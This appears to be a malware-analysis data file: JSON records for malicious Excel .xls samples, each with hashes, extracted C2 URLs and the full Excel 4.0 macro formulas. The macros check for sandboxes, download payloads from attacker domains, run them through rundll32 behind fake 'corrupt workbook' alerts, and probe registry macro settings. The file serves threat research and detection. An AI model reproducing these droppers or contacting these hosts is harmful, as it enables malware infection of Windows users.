corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WFWLUJV0PZ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c8ce9583a4f56a6acb216289a3bb5d9e902c35456248c97abac94bf5c1deb22"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c8ce9583a4f56a6acb216289a3bb5d9e902c35456248c97abac94bf5c1deb22","filesize":168448,"md5":"506c3d7f7f06eba1e4a8d65941b08908","sha1":"d7f35101df00a8472bf483401f20f1931ac34979","sha256":"3c8ce9583a4f56a6acb216289a3bb5d9e902c35456248c97abac94bf5c1deb22","sha512":"369c7212c16bccb38c5aea50d48f46aebd3d28717f7318c507b8c016377d384160bdfeb75edc031e56346606d97848084311400daab681b6500d7a1fdddeddf9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c8ce9583a4f56a6acb216289a3bb5d9e902c35456248c97abac94bf5c1deb22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xbC2c03ByS\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c8d3f405686f9051da830877c664574723c1535080c48abd9259bd16e90fd6c"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c8d3f405686f9051da830877c664574723c1535080c48abd9259bd16e90fd6c","filesize":168960,"md5":"4f84b25acd7d7244ac58d02842d36409","sha1":"e9a8e82ab2deab1259a64ec44a81fd06a24d819a","sha256":"3c8d3f405686f9051da830877c664574723c1535080c48abd9259bd16e90fd6c","sha512":"910a7430a69cee6090925c48c86edbcd60de759f36a0f92b3877c0acdf256f4201d25cf23ded5fc6e688f83789bb8ddf762a5617d3db384fab4dee4db24da358","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c8d3f405686f9051da830877c664574723c1535080c48abd9259bd16e90fd6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"keNLHjL3gO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c8e3cfa2a543fba17ec68d190ec1c979344d7fd052ec10779dfbe66eac36e3b"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c8e3cfa2a543fba17ec68d190ec1c979344d7fd052ec10779dfbe66eac36e3b","filesize":209920,"md5":"c5fb95db967829bec5e02584c76f18cc","sha1":"830139c5bc699ff72ec0cba186abc0981d1d3011","sha256":"3c8e3cfa2a543fba17ec68d190ec1c979344d7fd052ec10779dfbe66eac36e3b","sha512":"1876bba789ebb3ab7ec79816821a092e5ed318e14e06508fa8a12f0650d94fc2d5dc41e4484a3189c0e635a6a84f61612179bdbcf808ef1b53cd67cd8405d41d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c8e3cfa2a543fba17ec68d190ec1c979344d7fd052ec10779dfbe66eac36e3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BXBQfLYeYz\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c92e875e3b5d3d9ee0085d7cfbc28f91a96128d12b7ddcbdac57e06ab0cba1e"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c92e875e3b5d3d9ee0085d7cfbc28f91a96128d12b7ddcbdac57e06ab0cba1e","filesize":209920,"md5":"246f4ebb5f2225b08d0a69b101ad378b","sha1":"fccbc2983c408e4ed0afdfb7e807140d3be6146f","sha256":"3c92e875e3b5d3d9ee0085d7cfbc28f91a96128d12b7ddcbdac57e06ab0cba1e","sha512":"51c511a79b94d499fe617758e11c5d868ea07eb748dd712cbedd34e4b0ba2fed66accf826d0fa6e00fe66f423ed164ffe524743ea229a8c6bbaf0efa19edfb82","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c92e875e3b5d3d9ee0085d7cfbc28f91a96128d12b7ddcbdac57e06ab0cba1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B6yjWdbCd6\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ca978fe4f21bd15f297c1c2ab63be0d236c3edf8a80bde7d3a47e22c9378571"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3ca978fe4f21bd15f297c1c2ab63be0d236c3edf8a80bde7d3a47e22c9378571","filesize":167936,"md5":"1313520636ba987d84edf72335ee0338","sha1":"c214b3138fbe36c7801d9b90fc57b8d38f3f6490","sha256":"3ca978fe4f21bd15f297c1c2ab63be0d236c3edf8a80bde7d3a47e22c9378571","sha512":"4876a9147105e1f0b3296919ff9b2755ab173950d01b81d0526f86e46089c7c0b93d94f4274ab132bdd84df12c0d3d381450592d5e6fa5c26735edd18d311fd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ca978fe4f21bd15f297c1c2ab63be0d236c3edf8a80bde7d3a47e22c9378571.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EauFBwpDXz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3cb8c685e25e3128d11271b104eeb6211bfabca17538ee30bf4f4e0e5a12418a"},"analysis":{"reported":"2020-04-09T16:15:52Z","score":10},"files":[{"filename":"3cb8c685e25e3128d11271b104eeb6211bfabca17538ee30bf4f4e0e5a12418a","filesize":104448,"md5":"dc5de046e5e40e38a22832f2d6742728","sha1":"7120b0ae23dbce0c649415d24085dfa2d99cb666","sha256":"3cb8c685e25e3128d11271b104eeb6211bfabca17538ee30bf4f4e0e5a12418a","sha512":"4dee1f9841606f94f2bfe27e9822e1eb18843aa36b2302708e85d828e3f9a10cc0255d20d70d056798828b6d509978c9b8bb88a69b671159d8a41f0b50da9a44","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3cb8c685e25e3128d11271b104eeb6211bfabca17538ee30bf4f4e0e5a12418a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"BqRaWItrhX\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ce07d3c20b2c90c73e21de1fe3894ff908094d13f2762fe10037f89c590a231"},"analysis":{"reported":"2020-04-09T16:15:52Z","score":10},"files":[{"filename":"3ce07d3c20b2c90c73e21de1fe3894ff908094d13f2762fe10037f89c590a231","filesize":142848,"md5":"11c33f565e4ef60944134f3a958dcbcc","sha1":"9dcc1c74be8a510527703acd6f55477a97ad5135","sha256":"3ce07d3c20b2c90c73e21de1fe3894ff908094d13f2762fe10037f89c590a231","sha512":"4dc345de2e9e051a305f764cb2a4083456a687a02c91ada7be041fb85925cca2f9d7f4a1a6eb744981b60ce42f3206e333244997e7f8c6dc80245fc3527a887e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ce07d3c20b2c90c73e21de1fe3894ff908094d13f2762fe10037f89c590a231.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ObfR3ivNze\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3cecf81a77a79abb0ac17e5e39daa48d57f54bab6f6af38eee11b199f849b66f"},"analysis":{"reported":"2020-04-09T16:15:52Z","score":10},"files":[{"filename":"3cecf81a77a79abb0ac17e5e39daa48d57f54bab6f6af38eee11b199f849b66f","filesize":185344,"md5":"ce8b45c072a1b47bd4a93e7bbea86183","sha1":"8677a4cdee745e1e3f488882b90aeeb624b56fac","sha256":"3cecf81a77a79abb0ac17e5e39daa48d57f54bab6f6af38eee11b199f849b66f","sha512":"d97f35fc1e473178f6bda619adef5101d11d211ecfd72b46e519b7eed8700b6ae076982e1633bcbcf0760686f2f19a00cd2dc701a88434dc089b49728a0373b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3cecf81a77a79abb0ac17e5e39daa48d57f54bab6f6af38eee11b199f849b66f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3cfd3fad17e4ed3cc0992b63b881e39e7764ad26eca76a2184ea92dbfe16ea88"},"analysis":{"reported":"2020-04-09T16:15:52Z","score":10},"files":[{"filename":"3cfd3fad17e4ed3cc0992b63b881e39e7764ad26eca76a2184ea92dbfe16ea88","filesize":167936,"md5":"818ee321ba3ecb6303665f75ba6b1764","sha1":"4ea7597d29effd84afb71f79b9dd220fedbd97ce","sha256":"3cfd3fad17e4ed3cc0992b63b881e39e7764ad26eca76a2184ea92dbfe16ea88","sha512":"afb04a6c47c73323e1b4fd5dc1ffa3d3e9ef5918b912eb23c92b2f66b9fa4192e8cf7300017c996d24dacc156d4a795caefb4abb7db9e67cbfc2ca3ec2dae1d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3cfd3fad17e4ed3cc0992b63b881e39e7764ad26eca76a2184ea92dbfe16ea88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4nbwSUvmpR\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d0045ac4dc448e07c174034703a3d4beb8adb65c0a9df04322b55fbf8cca0ce"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d0045ac4dc448e07c174034703a3d4beb8adb65c0a9df04322b55fbf8cca0ce","filesize":209920,"md5":"482ef630f3ff1c8778dbc83741caa129","sha1":"2cbc91f465203ca50348619f6e44d540a1f0f629","sha256":"3d0045ac4dc448e07c174034703a3d4beb8adb65c0a9df04322b55fbf8cca0ce","sha512":"4a866b99d41a5858bb05c5c0d262e809718078f03d078f2a55b8f77e69e72eca35dc3f0d29b6b1443cce5232efd65a9ab2bd2ae1e3005052537f33a3f874cd37","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d0045ac4dc448e07c174034703a3d4beb8adb65c0a9df04322b55fbf8cca0ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qUygsW4RQI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d010b53d4b953f3fec5e219fd165ef2a0a57dcd8eeea4d8de11e742810bca8b"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d010b53d4b953f3fec5e219fd165ef2a0a57dcd8eeea4d8de11e742810bca8b","filesize":209920,"md5":"88c8fa3150db58acecbfdb060366cf70","sha1":"e7f52b6f37fbdb3091f4b1a8ad90e61699759d58","sha256":"3d010b53d4b953f3fec5e219fd165ef2a0a57dcd8eeea4d8de11e742810bca8b","sha512":"3732e5ce25c75a58ce55c7ed90e390c0ca1100087fab435fdc7d84cb8aa68d4ae37abb9b728fcf7ab14705e9dce007809b6ad28af8f9cc29a467ca8ae2dfe686","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d010b53d4b953f3fec5e219fd165ef2a0a57dcd8eeea4d8de11e742810bca8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3a3zess6GB\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d0425b92c75249463278d974840452a1d096aa04dd5c872f9653b55f45e96c1"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d0425b92c75249463278d974840452a1d096aa04dd5c872f9653b55f45e96c1","filesize":113664,"md5":"24d9326ad1ef6c49a6ba0cf757ff7948","sha1":"6ab567bc77f58f343b17a23d6ecdaaca4efac2bb","sha256":"3d0425b92c75249463278d974840452a1d096aa04dd5c872f9653b55f45e96c1","sha512":"6a08c10b9be1dc1e328a1d77cc7fbdaa85af0c3e9a05f50f8bff2ebbd9ee4ca9d34d3ea5dcb7398a5a489c3140f9870cfe9ae42343d0300d01cae131c1cdcd81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d0425b92c75249463278d974840452a1d096aa04dd5c872f9653b55f45e96c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7u1U63e7YF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d1323aac10e541c9e5d3dc405b0205a0d893e8b08b4450467e9150b08bc4541"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d1323aac10e541c9e5d3dc405b0205a0d893e8b08b4450467e9150b08bc4541","filesize":168960,"md5":"fafc6768631468846964621abd1aeae9","sha1":"407229e7c0d07c11ee061576c9e8f183382b4291","sha256":"3d1323aac10e541c9e5d3dc405b0205a0d893e8b08b4450467e9150b08bc4541","sha512":"f87ba9a6380cac9cadd8fc79f3fc539923d206e2ab854c41c7105b306954ea49b9db1479db30ec2cadaff213a1e3c2e873822dfb7b7db7f4397e5be907bf0284","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d1323aac10e541c9e5d3dc405b0205a0d893e8b08b4450467e9150b08bc4541.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"r6kJ68wcXt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d153e9321251e9890f8dace76fdf6d24cc93c9d6d15d72cbd944a66a3c765ba"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d153e9321251e9890f8dace76fdf6d24cc93c9d6d15d72cbd944a66a3c765ba","filesize":185344,"md5":"a1b762f9ac2c15b8fa1f77829731dad7","sha1":"e1da1a66f5ccfddc084a5342f19d8c88f346c205","sha256":"3d153e9321251e9890f8dace76fdf6d24cc93c9d6d15d72cbd944a66a3c765ba","sha512":"037509f11da33bf21c234384fb8cfb37e2cca104aa334eb0058b66afe12cb6582e400442a1ca9d4665a486f8f17579f45d47228149edafde16880d6d1a197ca4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d153e9321251e9890f8dace76fdf6d24cc93c9d6d15d72cbd944a66a3c765ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3d1f4d99df5495c53f3b9c8703ba1ef4c43368896f601abc0c319ec6f27d9579"},"analysis":{"reported":"2020-04-09T16:15:53Z","score":10},"files":[{"filename":"3d1f4d99df5495c53f3b9c8703ba1ef4c43368896f601abc0c319ec6f27d9579","filesize":147968,"md5":"796a7301e95a217e601b397deda32137","sha1":"ceb485950cf63b945b8dc352be65925160dc7fc6","sha256":"3d1f4d99df5495c53f3b9c8703ba1ef4c43368896f601abc0c319ec6f27d9579","sha512":"38375584c3df4e23585f7a841b7913982a4361e13f9508fc32a9f3958fc27e575ccd0ccc23df9ae798a7f06faacdc5cdf2489d9dac230757791012c1842e30a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3d1f4d99df5495c53f3b9c8703ba1ef4c43368896f601abc0c319ec6f27d9579.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"FmwB2nKt50\",TRUE)"}}}]}
